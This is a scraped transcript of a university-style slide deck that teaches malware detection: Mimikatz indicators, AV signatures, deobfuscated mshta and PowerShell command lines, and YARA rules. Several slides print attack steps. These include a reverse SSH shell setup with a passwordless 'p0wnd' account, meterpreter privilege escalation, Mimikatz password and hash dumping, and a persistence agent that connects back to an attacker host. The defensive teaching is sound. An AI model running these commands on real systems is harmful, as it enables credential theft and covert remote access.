Presentation is loading. Please wait.

Presentation is loading. Please wait.

Malware Insert Ominous and Pretentious Title Here. Seriously, it’s just software.

Published byRoss Anderson Modified over 6 years ago

Similar presentations

Presentation on theme: "Malware Insert Ominous and Pretentious Title Here. Seriously, it’s just software."— Presentation transcript:

1 Malware Insert Ominous and Pretentious Title Here. Seriously, it’s just software

2 Red Team vs. Blue Team Most resources and training describe what the attacker sees or how the attack works. They very rarely show the indicators seen by defenders. We will look at harvesting indicators and detecting malicious events on a network. © Dr. D. Kall Loper, all rights reserved

3 Malware Delivery © Dr. D. Kall Loper, all rights reserved Payload
Object with Shellcode Embedded Object with Obfuscated Binary Embedded Trojanized MS Word Document Payload Persistence Lateral Movement/Pivot Execute Local/Drop Downloader Command & Control VBA Script © Dr. D. Kall Loper, all rights reserved

4 Malware Delivery in the Environment
Object with Obfuscated Binary Embedded Internet Trojanized MS Word Document Firewall/AMP/Threat IDS/IPS End Point VBA Script Windows Services/Executables on System Payload Persistence Lateral Movement/Pivot Execute Local/Drop Downloader Command & Control © Dr. D. Kall Loper, all rights reserved

5 Malware Families Malware is classified into object groups by analysts and AV vendors, but each individual or group often does not agree on which criteria are definitive. The Hacker Tool: Mimikatz Analysis File Detail Copyright Copyright (c) gentilkiwi (Benjamin DELPY) Product mimikatz Original name mimikatz.exe Internal name mimikatz File version  Description mimikatz for Windows  PE header basic information Target machine x64 Compilation timestamp  :34:28 Entry Point 0x0002A954 Number of sections 6  PE sections Name Virtual address Virtual size Raw size Entropy MD5 .text 4096 197873 198144 6.31 180f5b44830e808ffa813de556377f63 .rdata 204800 190216 190464 3.90 aa0c2a1b850162c9bde827ac7fe419db .data 397312 15800 13824 2.83 912ef60fc0f1231b0583a30a171d127a .pdata 413696 6312 6656 5.30 f35f e21c8a99b6a2368d497fb .rsrc 421888 16376 16384 6.55 ae daed498d0ea56095c3088 .reloc 438272 5324 5632 4.87 1b1ed1569d3d2a bfe374bc8  PE imports [+] ADVAPI32.dll [+] CRYPT32.dll [+] HID.DLL [+] KERNEL32.dll [+] NETAPI32.dll [+] NTDSAPI.dll [+] RPCRT4.dll [+] SAMLIB.dll [+] SETUPAPI.dll [+] SHELL32.dll [+] SHLWAPI.dll [+] Secur32.dll [+] USER32.dll [+] cryptdll.dll [+] msvcrt.dll [+] ntdll.dll  Number of PE resources by type RT_ICON 3 RT_VERSION 1 RT_GROUP_ICON 1  Number of PE resources by language ENGLISH US 5  ExifTool file metadata SpecialBuild kiwi flavor ! SubsystemVersion 5.2 LinkerVersion 9.0 ImageVersion 0.0 FileSubtype FileVersionNumber LanguageCode English (U.S.) FileFlagsMask 0x003f FileDescription mimikatz for Windows CharacterSet Unicode InitializedDataSize 235008 PrivateBuild Build with love for POC only EntryPoint 0x2a954 OriginalFileName mimikatz.exe MIMEType application/octet-stream LegalCopyright FileVersion TimeStamp 2016:05:01 00:34:28+01:00 FileType Win64 EXE PEType PE32+ InternalName mimikatz ProductVersion UninitializedDataSize OSVersion FileOS Windows NT Subsystem Windows command line MachineType AMD AMD64 CompanyName gentilkiwi (Benjamin DELPY) CodeSize 198144 ProductName ProductVersionNumber FileTypeExtension exe ObjectFileType Executable application Kaspersky HEUR:Trojan-PSW.Win32.Mimikatz.gen McAfee RDN/Generic PUP.z Symantec Trojan.Gen.2 ClamAV Not Detected as Malware (6/24/2016) © Dr. D. Kall Loper, all rights reserved

6 VirusTotal Aggregates Multiple Vendors
© Dr. D. Kall Loper, all rights reserved

7 Scanning with Signatures
Hash/String/0xChain The essence of AV scanning is to compare the whole file to a hash of known malware. There are refinements that allow scanning of known sections or even storage blocks of the file (not physical blocks). Other techniques search for strings or chains of hexadecimal. “A related effort in the context of Indicators of Compromise is OpenIOC, which includes IOC Editor and IOC Finder.” -Zeltser © Dr. D. Kall Loper, all rights reserved

8 Scanning with Signatures
IoC’s are… Key locations with constant values, known strings, constant sizes (whole or sections), groupings of suspicious API calls, function names, and many other programming artifacts as IoC’s IoC’s also include locations and techniques of randomly generating names in the file system or network connections IP’s and Domains built in to malware “A related effort in the context of Indicators of Compromise is OpenIOC, which includes IOC Editor and IOC Finder.” -Zeltser © Dr. D. Kall Loper, all rights reserved

9 Scanning with Signatures
Artifacts from Compilation can help identify a specimen. FileVersionNumber: LanguageCode: English (U.S.) FileFlagsMask: 0x003f FileDescription: mimikatz for Windows InitializedDataSize: EntryPoint: 0x2a954 OriginalFileName: mimikatz.exe FileVersion: TimeStamp: 2016:05:01 00:34:28+01:00 FileType: Win64 EXE PEType: PE32+ InternalName: mimikatz ProductVersion: UninitializedDataSize: 0 OSVersion: 5.2 FileOS: Windows NT Subsystem: Windows command line MachineType: AMD AMD64 CodeSize: ProductName: mimikatz ProductVersionNumber: FileTypeExtension: exe ObjectFileType: Executable application © Dr. D. Kall Loper, all rights reserved

10 Scanning with Signatures
Heuristic rules can detect suspicious collections of functionality being imported to a process. DLL import lists can be an important IoC, but are not the only ones. These DLL’s are imported by a W32 PE file identified as Mimikatz. File Detail Copyright Copyright (c) gentilkiwi (Benjamin DELPY) Product mimikatz Original name mimikatz.exe Internal name mimikatz File version  Description mimikatz for Windows  PE header basic information Target machine x64 Compilation timestamp  :34:28 Entry Point 0x0002A954 Number of sections 6  PE sections Name Virtual address Virtual size Raw size Entropy MD5 .text 4096 197873 198144 6.31 180f5b44830e808ffa813de556377f63 .rdata 204800 190216 190464 3.90 aa0c2a1b850162c9bde827ac7fe419db .data 397312 15800 13824 2.83 912ef60fc0f1231b0583a30a171d127a .pdata 413696 6312 6656 5.30 f35f e21c8a99b6a2368d497fb .rsrc 421888 16376 16384 6.55 ae daed498d0ea56095c3088 .reloc 438272 5324 5632 4.87 1b1ed1569d3d2a bfe374bc8  PE imports [+] ADVAPI32.dll [+] CRYPT32.dll [+] HID.DLL [+] KERNEL32.dll [+] NETAPI32.dll [+] NTDSAPI.dll [+] RPCRT4.dll [+] SAMLIB.dll [+] SETUPAPI.dll [+] SHELL32.dll [+] SHLWAPI.dll [+] Secur32.dll [+] USER32.dll [+] cryptdll.dll [+] msvcrt.dll [+] ntdll.dll  Number of PE resources by type RT_ICON 3 RT_VERSION 1 RT_GROUP_ICON 1  Number of PE resources by language ENGLISH US 5  ExifTool file metadata SpecialBuild kiwi flavor ! SubsystemVersion 5.2 LinkerVersion 9.0 ImageVersion 0.0 FileSubtype FileVersionNumber LanguageCode English (U.S.) FileFlagsMask 0x003f FileDescription mimikatz for Windows CharacterSet Unicode InitializedDataSize 235008 PrivateBuild Build with love for POC only EntryPoint 0x2a954 OriginalFileName mimikatz.exe MIMEType application/octet-stream LegalCopyright FileVersion TimeStamp 2016:05:01 00:34:28+01:00 FileType Win64 EXE PEType PE32+ InternalName mimikatz ProductVersion UninitializedDataSize OSVersion FileOS Windows NT Subsystem Windows command line MachineType AMD AMD64 CompanyName gentilkiwi (Benjamin DELPY) CodeSize 198144 ProductName ProductVersionNumber FileTypeExtension exe ObjectFileType Executable application ADVAPI32.dll NETAPI32.dll SETUPAPI.dll USER32.dll CRYPT32.dll NTDSAPI.dll SHELL32.dll cryptdll.dll HID.DLL RPCRT4.dll SHLWAPI.dll msvcrt.dll KERNEL32.dll SAMLIB.dll Secur32.dll ntdll.dll © Dr. D. Kall Loper, all rights reserved

11 Scanning with Signatures
MD5 hashes for sections of a W32 PE file identified as Mimikatz. Name Virtual Address Virtual Size Raw Size Entropy MD5 .text 4096 197873 198144 6.31 180f5b44830e808ffa813de556377f63 .rdata 204800 190216 190464 3.9 aa0c2a1b850162c9bde827ac7fe419db .data 397312 15800 13824 2.83 912ef60fc0f1231b0583a30a171d127a .pdata 413696 6312 6656 5.3 f35f e21c8a99b6a2368d497fb .rsrc 421888 16376 16384 6.55 ae daed498d0ea56095c3088 .reloc 438272 5324 5632 4.87 1b1ed1569d3d2a bfe374bc8 File Detail Copyright Copyright (c) gentilkiwi (Benjamin DELPY) Product mimikatz Original name mimikatz.exe Internal name mimikatz File version  Description mimikatz for Windows  PE header basic information Target machine x64 Compilation timestamp  :34:28 Entry Point 0x0002A954 Number of sections 6  PE sections Name Virtual address Virtual size Raw size Entropy MD5 .text 4096 197873 198144 6.31 180f5b44830e808ffa813de556377f63 .rdata 204800 190216 190464 3.90 aa0c2a1b850162c9bde827ac7fe419db .data 397312 15800 13824 2.83 912ef60fc0f1231b0583a30a171d127a .pdata 413696 6312 6656 5.30 f35f e21c8a99b6a2368d497fb .rsrc 421888 16376 16384 6.55 ae daed498d0ea56095c3088 .reloc 438272 5324 5632 4.87 1b1ed1569d3d2a bfe374bc8  PE imports [+] ADVAPI32.dll [+] CRYPT32.dll [+] HID.DLL [+] KERNEL32.dll [+] NETAPI32.dll [+] NTDSAPI.dll [+] RPCRT4.dll [+] SAMLIB.dll [+] SETUPAPI.dll [+] SHELL32.dll [+] SHLWAPI.dll [+] Secur32.dll [+] USER32.dll [+] cryptdll.dll [+] msvcrt.dll [+] ntdll.dll  Number of PE resources by type RT_ICON 3 RT_VERSION 1 RT_GROUP_ICON 1  Number of PE resources by language ENGLISH US 5  ExifTool file metadata SpecialBuild kiwi flavor ! SubsystemVersion 5.2 LinkerVersion 9.0 ImageVersion 0.0 FileSubtype FileVersionNumber LanguageCode English (U.S.) FileFlagsMask 0x003f FileDescription mimikatz for Windows CharacterSet Unicode InitializedDataSize 235008 PrivateBuild Build with love for POC only EntryPoint 0x2a954 OriginalFileName mimikatz.exe MIMEType application/octet-stream LegalCopyright FileVersion TimeStamp 2016:05:01 00:34:28+01:00 FileType Win64 EXE PEType PE32+ InternalName mimikatz ProductVersion UninitializedDataSize OSVersion FileOS Windows NT Subsystem Windows command line MachineType AMD AMD64 CompanyName gentilkiwi (Benjamin DELPY) CodeSize 198144 ProductName ProductVersionNumber FileTypeExtension exe ObjectFileType Executable application © Dr. D. Kall Loper, all rights reserved

12 Scanning with Signatures
*YARA comes later Unique strings and metadata from the compiler can help identify a specimen SpecialBuild: kiwi flavor ! PrivateBuild: Build with love for POC only LegalCopyright: Copyright (c) gentilkiwi (Benjamin DELPY) CompanyName: gentilkiwi (Benjamin DELPY) © Dr. D. Kall Loper, all rights reserved

13

14 Mimikatz Definition Mimikatz is a post exploitation tool. It is also available as meterpreter script Mimikatz is “well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets.” ( emphasis original) © Dr. D. Kall Loper, all rights reserved

15 Mimikatz Has both 32-bit and 64-bit versions.
If a 32-bit process is initiated by Metasploit, the 32-bit version of Mimikatz will load. Needs System level privileges SID: S Needs Mimikatz.exe and sekurlsa.dll functionality on target system Version 1 can be run as a Metasploit script. Can be PyEx’d © Dr. D. Kall Loper, all rights reserved

16 Mimikatz in Action © Dr. D. Kall Loper, all rights reserved Drop
Obfuscated Crypto Key Object with Obfuscated Binary Embedded Trojanized MS Word Document Drop Decrypted Metasploit stager (~70k) VBA Script © Dr. D. Kall Loper, all rights reserved

17 Stager Definition Malware function that deobfuscates, decrypts, installs, or otherwise unpacks malicious content. Also called Downloader or Dropper depending on the method used. © Dr. D. Kall Loper, all rights reserved

18 Definition WMIC Windows™ Management Instrumentation Command-line
‘Everything you can do in the GUI, you can do in the command line.’ A command line and scripting host that uses alias to access Windows administrative functions. Alias – Verb - Switch WMIC, © Dr. D. Kall Loper, all rights reserved

19 Definition PowerShell
Windows PowerShell is a Windows command-line shell designed especially for system administrators. Windows PowerShell includes an interactive prompt and a scripting environment. © Dr. D. Kall Loper, all rights reserved

20 Embedded WMIC & PowerShell
Various combinations of Windows Scripting Host, WMIC, and PowerShell can be invoked to bypass AV and even AMP. Process filters like Tanium™ or Carbon Black ™ can be used to check for invocations, but there are many false positives. © Dr. D. Kall Loper, all rights reserved

21 Mimikatz in the Environment
Internet Downloader X Firewall/AMP/Threat IDS/IPS End Point Windows Services/Executables on System Payload Sekurlsa.dll Mimikatz.exe © Dr. D. Kall Loper, all rights reserved

22 Carbon Black’s View © Dr. D. Kall Loper, all rights reserved

23 Fileless Malware Poweliks is a true fileless malware, leaving no files on the disk. Instead, it hides code in the Registry. Undetectable by signature-based scanners. It needs to be caught at execution Poweliks (Downloader) Gootkit (Banking malware) also called: XSW, XSWKit, Hpmal. Not truly fileless. It uses a Rootkit to hide file from scanners. Kovter (Clickfraud/cryptoware) Not truly fileless, but uses legitmate program’s memory space to execute for persistence. © Dr. D. Kall Loper, all rights reserved

24 Deobfuscation 1 “C:\Windows\System32\cmd.exe /C start “” “C:\Users\Victim\AppData\Roaming\fce81\d5d42.d806c1” Runs an innocuous function in a shady place with a Mutex-like/pseudo-random name. However, it avoids searches for process running from “temp” directory. © Dr. D. Kall Loper, all rights reserved

25 Deobfuscation 2 “C:\Windows\System32\mshta.exe” “javascript:Lm6fll=“T8YxIEPM”;z1U=new ActiveXObject(“Wscriptshell”);qkfO8eh=“iMvZ11iC”; No3oT=z1U.RegRead(“HKCU\\software\\fyucgba\\zgrwg”);h6x4ZFa=“Y”;eval(No3oT);lg6bUHtz=“SiaYLh58”;” © Dr. D. Kall Loper, all rights reserved

26 Deobfuscation 2 MSHTA cont.
Rearranged: eval(new javascript: ActiveXObject(“Wscriptshell”) .RegRead(“HKCU\\software\\fyucgba\\zgrwg”) Mshta is the built in function to decompile “HTML-compiled” or “hta” archives which may include javascript. © Dr. D. Kall Loper, all rights reserved

27 Deobfuscation 3 “C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe” iex $env:sytb Uses Powershell to invoke an expression (iex) through an environmental variable ($env:) “sytb” © Dr. D. Kall Loper, all rights reserved

28 Deobfuscation, More Generally
powershell launched with the Invoke-Expression argument: powershell.exe cmdline:iex rundll32.exe launched with javascript rundll32.exe “mshtml,runhtmlapplication” © Dr. D. Kall Loper, all rights reserved

29 Deobfuscation, More Generally
rundll32 launching powershell: powershell.exe parent process:rundll32.exe powershell launching dllhost: Parent process: powershell.exe Child process:dllhost.exe © Dr. D. Kall Loper, all rights reserved

30 Command and Control Reverse HTTP Shells
Any protocol can be embedded in almost any other protocol. Quick and dirty with NGINX. The attacker needs: Server with a public IP, Domain name, Wildcard DNS entry in the domain pointing to the public IP, NGINX server, and SSHD running on server Wildcard DNS A wildcard dns should point to this NGINX instance. Every www<port>.domain.tld will be proxied to  :<port> Where <port> needs to be 4 or 5 digits. NGINX Configuration Server { server_name "~^www(?<port>\d{4,5})\.domain\.tld$"; location / { proxy_pass proxy_set_header X-Real-IP $remote_addr; proxy_set_header Host $host; } } SSH Configuration Without some control the compromised host could get full shell access on the attacker! The compromised host will be given the username “p0wnd” The following line will create the user “p0wnd” in etc/shadow with no password. sshd -f /etc/ssh/sshd_config_p0wnd Add the following lines to /etc/ssh/sshd_config Match User p0wnd # ChrootDirectory ForceCommand /bin/echo do-not-send-commands AllowTcpForwarding yes PasswordAuthentication yes PermitEmptyPasswords yes Configure PAM if it is used. It should be. Add the following line to pam_access.so + : p0wnd : ALL This allows “p0wnd” to login from anywhere. References SSH Man Page © Dr. D. Kall Loper, all rights reserved

31 Reverse Shell in Action
Internet Compromised Host Firewall/AMP/Threat IDS/IPS End Point ssh -N -T <routable IP> -l p0wnd -R 0:localhost:1337 -p 51337 SSH Invoke SSH -N Do not execute a remote command. This is useful for just for- warding ports. -T Disable pseudo-terminal allocation. <Routable IP> An IP usable on the open Internet (non-reserved IP) -l login_name Specifies the user to log in as on the remote machine. This also may be specified on a per-host basis in the configuration file. “p0wnd” -R [bind_address:]port:host:hostport Specifies that connections to the given TCP port on the remote (server) host are to be forwarded to the given host and port on the local side. This works by allocating a socket to listen to a TCP port on the remote side. Whenever a connection is made to this port the connection is forwarded over the secure channel, and a connection is made to hostport from the local machine. If the port argument is `0', the listen port will be dynamically allocated on the server and reported to the client at run time. -p port Port to connect to on the remote host. This can be specified on a per-host basis in the configuration file. The port selected here is because even bad security admins, forensic analysts, and incident responders need a break. References SSH Man Page Reverse HTTP(s) Shell shows normal 80 (443) traffic from internal host to Internet server. Proxies can be authenticated with UN:PW Windows Services/Executables on System ssh -N -T <routable IP> -l p0wnd -R 0:localhost:1337 -p 51337 © Dr. D. Kall Loper, all rights reserved

32 Segue A transition from old to new
The only reason I care about Steve Jobs is that he was friends with Woz.

33 Mimikatz & Metasploit Once a system is compromised, the intruder usually attempts to escalate, persist, and pivot within the environment. The priority of these tasks varies with attacker. With many established locations in the network, the attacker may feel more free to be noisy. © Dr. D. Kall Loper, all rights reserved

34 Mimikatz & Metasploit Metasploit provides a mechanism to pursue these goals in a interactive environment that doesn’t require wmic or cmd.exe. Meterpreter provides a platform to invoke metasploit modules and other utilities. Recall Mimikatz’s requirements: Has both 32-bit and 64-bit versions. Needs System level privileges Needs Mimikatz.exe and sekurlsa.dll functionality on target system © Dr. D. Kall Loper, all rights reserved

35 Mimikatz & Metasploit meterpreter > getuid Server username: p0wndbox\Administrator meterpreter > getsystem –t 1 … got system (via techniquw 1). Server username: NT AUTHORITY\SYSTEM Technique 0, “getsystem –t 0” tries all three techniques Technique 1, named pipe and service impersonation. Runs cmd.exe /c echo “data” >\\.\pipe\<random> Technique 2, schedules rundll32.exe to run a DLL dropped on the system (noisy) Technique 3, reflective dll injection. Requires SeDebugPrivilege. See uses elevator.dll to get SYSTEM token and applies it to meterpreter. Elevator.dll see Also possible to generate the payload as an executable and run it using SC.exe The executable can be scheduled to run with at.exe. NOTE: at does not invoke cmd.exe with an explicit call “cmd netstat –an > Nestat-%time%.txt” Technique 1 uses a named pipe and cmd.exe to create a service and impersonate the “SYSTEM” context. © Dr. D. Kall Loper, all rights reserved

36 Mimikatz & Metasploit meterpreter > sysinfo Computer : p0wndbox OS : Windows 7 (Build 7601, Service Pack 1). Architecture : x86 System Language : en_US Meterpreter : x86/win64 Sysinfo verifies the processor type which determines which meterpreter to load. © Dr. D. Kall Loper, all rights reserved

37 Mimikatz & Metasploit meterpreter > load Mimikatz
Loading extension Mimikatz…success. Meterpreter > mimikatz_command –f samdump::hashes Ordinateur : p0wndbox BootKey : e6b4d597a52c1211c21a539dee2ffa20 Rid : 500 User : Administrator LM : NTLM : 5918b20466d798aeeac5f789fb186326 Rid : 501 User : Guest …and many others © Dr. D. Kall Loper, all rights reserved

38 Mimikatz & Metasploit Meterpreter > mimikatz_command –f sekurlsa::searchPasswords [0] { Administrator ; p0wndbox ; password123 } Metasploit has version 1.0 of mimikatz built in. The earlier version requires separate steps to set debug privileges and inject sekurlsa.dll into LSASS.exe. It was more exciting than the above. © Dr. D. Kall Loper, all rights reserved

39 Definition LSASS Local Security Authority Subsystem Service
Manages Windows user authentication. Location C:\Windows\System32\lsass.exe Md5: a3399d19610ce2d71e0c3e5d9 Size: 31,312 bytes © Dr. D. Kall Loper, all rights reserved

40 LSASS Dependent Services
CNG Key Isolation KeyIso/ keyiso.dll Provides key process isolation to private keys and associated cryptographic operations as required by the Common Criteria. Credential Manager VaultSvc/ vaultsvc.dll Provides secure storage and retrieval of credentials to users, applications and security service packages. Encrypting File System (EFS) EFS/ efssvc.dll The core file encryption technology used to store encrypted files on NTFS volumes. Netlogon Netlogon/ netlogon.dll Network Authentication: Maintains a secure channel between local computer and the domain controller for authenticating users and services. Protected Storage ProtectedStorage/ psbase.dll Provides protected storage for sensitive data, such as passwords, to prevent access by unauthorized services, processes, or users. Security Accounts Manager SamSs/ samsrv.dll The startup of this service signals other services that the Security Accounts Manager (SAM) is ready to accept requests. © Dr. D. Kall Loper, all rights reserved

41 LSASS on an Active System
© Dr. D. Kall Loper, all rights reserved

42 Metasploit Persistence
Meterpreter > run persistence –U – I 30 –p 443 –r [*] Creating a persistent agent: LHOST= LPORT=443 (interval=30 onboot=true) [*] Persistent agent script is bytes long [*] Uploaded the persistent agent to C:\WINDOWS\TEMP\121e2J5d.vbs [*] Agent executed with PID 354 [*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\491h2121e2KL539 [*] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\NyFBv8tnNNBdX0z [*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/persistence/p0wndbox_ /clean_up__ rc meterpreter > -A Automatically start a matching multi/handler to connect to the agent -U Automatically start the agent when the User logs on -X Automatically start the agent when the system boots -h This help menu -i The interval in seconds between each connection attempt -p The port on the remote host where Metasploit is listening -r The IP of the system running Metasploit listening for the connect back -Metasploit help invoked: “run persistence –h” © Dr. D. Kall Loper, all rights reserved

43 Segue The only reason I care about Steve Jobs is that he was friends with Woz.

44 YARA Definition A tool to classify and identify malware. YARA definitions (rules) can identify a malware family or individual specimen through strings and Boolean logic. © Dr. D. Kall Loper, all rights reserved

45 YARA, Good Practice The best YARA rules describe behavior that is necessary to the malicious function of the malware and sufficient to distinguish malware from accepted software or even other families of malware. Risk strategies can be based on sufficiently accurate categorization of threats. Reference © Dr. D. Kall Loper, all rights reserved

46 YARA, Good Practice Strings, resources, and function bytes tend to make the best YARA rule subjects. Statically coded passwords, domains, and paths for files change. These are time sensitive to a particular family. They are also VERY useful in network threat feeds. When coding rules, do not include common variables and common code libraries. Rules should describe a unique feature set. Reference © Dr. D. Kall Loper, all rights reserved

47 YARA, Good Practice Refine YARA rules with feedback from IR Team and Threat Intel Team. Compiler produced strings may be useful for searching with Host-based tools like Carbon Black or direct analysis, but are not good with automated scanning because of the false positives. Shell code for malicious actions make almost ‘Heuristic’ generic rules. Reference © Dr. D. Kall Loper, all rights reserved

48 YARA Signature for Mimikatz
{ meta: description = “mimikatz” author = “Benjamin DELPY (gentilkiwi)” tool_author = “Benjamin DELPY (gentilkiwi)” strings: $exe_x86_ = { [0-3] 30 8d 04 bd } $exe_x86_ = { [0-3] 38 8d 04 b5 } $exe_x64_ = { 4c 03 d8 49 [0-3] 8b } $exe_x64_ = { 4c 8b df 49 [0-3] c1 e [0-3] 8b cb 4c 03 [0-3] d8 } $dll_ = { c7 0? [4-14] c7 0? } $dll_ = { c7 0? ?? 89 4? } $sys_x = { a [0-4] b c } $sys_x = { c [0-4] e f } condition: (all of ($exe_x86_*)) or (all of ($exe_x64_*)) or (all of ($dll_*)) or (any of ($sys_*)) } rule mimikatz_lsass_mdmp description = “LSASS minidump file for mimikatz” $lsass = “System32\\lsass.exe” wide nocase (uint32(0) == 0x504d444d) and $lsass rule mimikatz_kirbi_ticket { meta: description = “KiRBi ticket for mimikatz” author = “Benjamin DELPY (gentilkiwi)” strings: $asn = { ?? ?? ?? ?? a a } condition: $asn1 at 0 } rule wce description = “wce” tool_author = “Hernan Ochoa (hernano)” $hex_legacy = { 8b ff 55 8b ec 6a 00 ff 75 0c ff e8 [0-3] 5d c } $hex_x = { 8d 45 f0 50 8d 45 f8 50 8d 45 e8 50 6a 00 8d 45 fc 50 [0-8] d } $hex_x = { ff f ec b d9 48 8d 15 [0-16] d } any of them © Dr. D. Kall Loper, all rights reserved

49 YARA Signature for Mimikatz
{ strings: $exe_x86_1 = { [0-3] 30 8d 04 bd } $exe_x86_2 = { [0-3] 38 8d 04 b5 } $exe_x64_1 = { 4c 03 d8 49 [0-3] 8b } $exe_x64_2 = { 4c 8b df 49 [0-3] c1 e [0-3] 8b cb 4c 03 [0-3] d8 } $dll_ = { c7 0? [4-14] c7 0? } $dll_ = { c7 0? ?? 89 4? } $sys_x = { a [0-4] b c } $sys_x = { c [0-4] e f } condition: (all of ($exe_x86_*)) or (all of ($exe_x64_*)) or (all of ($dll_*)) or (any of ($sys_*)) meta: description = “mimikatz” author = “Benjamin DELPY (gentilkiwi)” tool_author = “Benjamin DELPY (gentilkiwi) © Dr. D. Kall Loper, all rights reserved

50 YARA Signature for Mimikatz
rule mimikatz_lsass_mdmp { strings: $lsass = “System32\\lsass.exe” wide nocase condition: (uint32(0) == 0x504d444d) and $lsass } meta: description = “LSASS minidump file for mimikatz” author = “Benjamin DELPY (gentilkiwi)” © Dr. D. Kall Loper, all rights reserved

51 YARA Signature for Mimikatz
rule mimikatz_kirbi_ticket { strings: $asn = { ?? ?? ?? ?? a a } condition: $asn1 at 0 } meta: description = “KiRBi ticket for mimikatz” author = “Benjamin DELPY (gentilkiwi)” Kerberos uses ASN1 (Abstract Syntax Notation 1) encoding of the data in it's packets RFC This requires a grammar to be established to decipher the bit stream (for PER, Packed Encoding Rules) or byte stream (XER, XML Encoding Rules). © Dr. D. Kall Loper, all rights reserved

52 YARA Signature for Mimikatz
rule wce { strings: $hex_legacy = { 8b ff 55 8b ec 6a 00 ff 75 0c ff e8 [0-3] 5d c } $hex_x = { 8d 45 f0 50 8d 45 f8 50 8d 45 e8 50 6a 00 8d 45 fc 50 [0-8] d } $hex_x = { ff f ec b d9 48 8d 15 [0-16] d } condition: any of them} meta: description = “wce” author = “Benjamin DELPY (gentilkiwi)” tool_author = “Hernan Ochoa (hernano)” Windows Credential Editor © Dr. D. Kall Loper, all rights reserved

53 Mutex in YARA Rules Mutex in YARA rules
Mutexs are among the most unique IoC’s to the malware using them. They are also the most mercurial. A particular Mutex can be used during an outbreak, but are not stable IoC’s in the long term. © Dr. D. Kall Loper, all rights reserved

54 Definition Mutex Mutex (Mutual Exclusion)
An object that signals whether it is owned or not owned. Any thread with a handle to a mutex object can request ownership of the mutex object. If not owned, the mutex is assigned to the requesting process, granting access to a shared memory space. Mutex Objestc, Mutex, © Dr. D. Kall Loper, all rights reserved

55 Definition Mutex Mutex (Mutual Exclusion)
A special use, counting semaphore with a count of one that can only be unlocked by the locking process. Mutex Objestc, Mutex, © Dr. D. Kall Loper, all rights reserved

56 Mutex in Malware What does a Mutex do for Malware?
It is one mechanism to prevent reinfection of the host system. © Dr. D. Kall Loper, all rights reserved

57 Without Mutex The RTM Worm Source In 1988, 99 lines of code.
Exploited fingerd, sendmail debug mode, and implemented a 432 word dictionary attack on rsh and rexec. It didn’t stop until the Internet did. © Dr. D. Kall Loper, all rights reserved

Download ppt "Malware Insert Ominous and Pretentious Title Here. Seriously, it’s just software."

Similar presentations

Enabling Secure Internet Access with ISA Server

Enabling Secure Internet Access with ISA Server
SSH : The Secure Shell By Rachana Maheswari CS265 Spring 2003.

SSH : The Secure Shell By Rachana Maheswari CS265 Spring 2003.
Information Networking Security and Assurance Lab National Chung Cheng University F.I.R.E. Forensics & Incident Response Environment.

Information Networking Security and Assurance Lab National Chung Cheng University F.I.R.E. Forensics & Incident Response Environment.
How Clients and Servers Work Together. Objectives Learn about the interaction of clients and servers Explore the features and functions of Web servers.

How Clients and Servers Work Together. Objectives Learn about the interaction of clients and servers Explore the features and functions of Web servers.
Apache : Installation, Configuration, Basic Security Presented by, Sandeep K Thopucherela, ECE Department.

Apache : Installation, Configuration, Basic Security Presented by, Sandeep K Thopucherela, ECE Department.
2004, Jei F.I.R.E. Forensics & Incident Response Environment Information Networking Security and Assurance Lab National Chung Cheng University.

2004, Jei F.I.R.E. Forensics & Incident Response Environment Information Networking Security and Assurance Lab National Chung Cheng University.
 Proxy Servers are software that act as intermediaries between client and servers on the Internet.  They help users on private networks get information.

 Proxy Servers are software that act as intermediaries between client and servers on the Internet.  They help users on private networks get information.
Internet Relay Chat Chandrea Dungy Derek Garrett #29.

Internet Relay Chat Chandrea Dungy Derek Garrett #29.
Dennis  Application Security Specialist  WhiteHat Security  Full-Time Student  University of Houston – Main Campus ▪ Computer.

Dennis  Application Security Specialist  WhiteHat Security  Full-Time Student  University of Houston – Main Campus ▪ Computer.
MS systems use one of the following: LanManager Hash (LM) LanManager Hash (LM) NT LanManager (NTLM) NT LanManager (NTLM) Cached passwords Cached passwords.

MS systems use one of the following: LanManager Hash (LM) LanManager Hash (LM) NT LanManager (NTLM) NT LanManager (NTLM) Cached passwords Cached passwords.
INTRODUCTION TO WEB DATABASE PROGRAMMING

INTRODUCTION TO WEB DATABASE PROGRAMMING
Securing Windows 7 Lesson 10. Objectives Understand authentication and authorization Configure password policies Secure Windows 7 using the Action Center.

Securing Windows 7 Lesson 10. Objectives Understand authentication and authorization Configure password policies Secure Windows 7 using the Action Center.
1 Chap 10 Malicious Software. 2 Viruses and ”Malicious Programs ” Computer “Viruses” and related programs have the ability to replicate themselves on.

1 Chap 10 Malicious Software. 2 Viruses and ”Malicious Programs ” Computer “Viruses” and related programs have the ability to replicate themselves on.
Web Servers Web server software is a product that works with the operating system The server computer can run more than one software product such as e-mail.

Web Servers Web server software is a product that works with the operating system The server computer can run more than one software product such as .
Chapter-4 Windows 2000 Professional Win2K Professional provides a very usable interface and was designed for use in the desktop PC. Microsoft server system.

Chapter-4 Windows 2000 Professional Win2K Professional provides a very usable interface and was designed for use in the desktop PC. Microsoft server system.
FALL 2005CSI 4118 – UNIVERSITY OF OTTAWA1 Part 4 Web technologies: HTTP, CGI, PHP,Java applets)

FALL 2005CSI 4118 – UNIVERSITY OF OTTAWA1 Part 4 Web technologies: HTTP, CGI, PHP,Java applets)
1 Chap 10 Virus. 2 Viruses and ”Malicious Programs ” Computer “Viruses” and related programs have the ability to replicate themselves on an ever increasing.

1 Chap 10 Virus. 2 Viruses and ”Malicious Programs ” Computer “Viruses” and related programs have the ability to replicate themselves on an ever increasing.
Implementing a Port Knocking System in C Honors Thesis Defense by Matt Doyle.

Implementing a Port Knocking System in C Honors Thesis Defense by Matt Doyle.
1 Welcome to CSC 301 Web Programming Charles Frank.

1 Welcome to CSC 301 Web Programming Charles Frank.
Week 10-11c Attacks and Malware III. Remote Control Facility distinguishes a bot from a worm distinguishes a bot from a worm worm propagates itself and.

Week 10-11c Attacks and Malware III. Remote Control Facility distinguishes a bot from a worm distinguishes a bot from a worm worm propagates itself and.

Similar presentations

Ads by Google